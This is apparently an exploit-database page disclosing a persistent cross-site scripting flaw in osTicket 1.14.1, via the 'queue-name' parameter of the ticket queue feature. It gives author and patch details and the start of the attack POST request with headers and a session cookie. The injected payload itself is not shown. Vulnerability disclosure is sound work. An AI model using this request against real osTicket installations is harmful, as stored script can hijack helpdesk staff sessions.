Osticket 1.14.1 ticket queue persistent crosssite scripting Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-05-27 |
Type : webapps |
Platform : php
This exploit / vulnerability Osticket 1.14.1 ticket queue persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting
# Date: 2020-05-26
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://osticket.com
# Patch Link: https://github.com/osTicket/osTicket/commit/6c724ea3fe352d10d457d334dc054ef81917fde1
# Version: osTicket 1.14.1
# Tested on: CentOS 7 (1908)
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'Ticket Queue' functionality of osTicket.
# Vulnerable Parameter : queue-name
# Exploit Details : The following request will create a ticket queue with an XSS payload as the queue name.
POST /os-ticket/scp/queues.php? HTTP/1.1
Content-Length: 4491
Cache-Control: max-age=0
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://TARGET/os-ticket/scp/queues.php?
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OSTSESSID=0c1ssokv9npgmlolue4utj3l81
Connection: close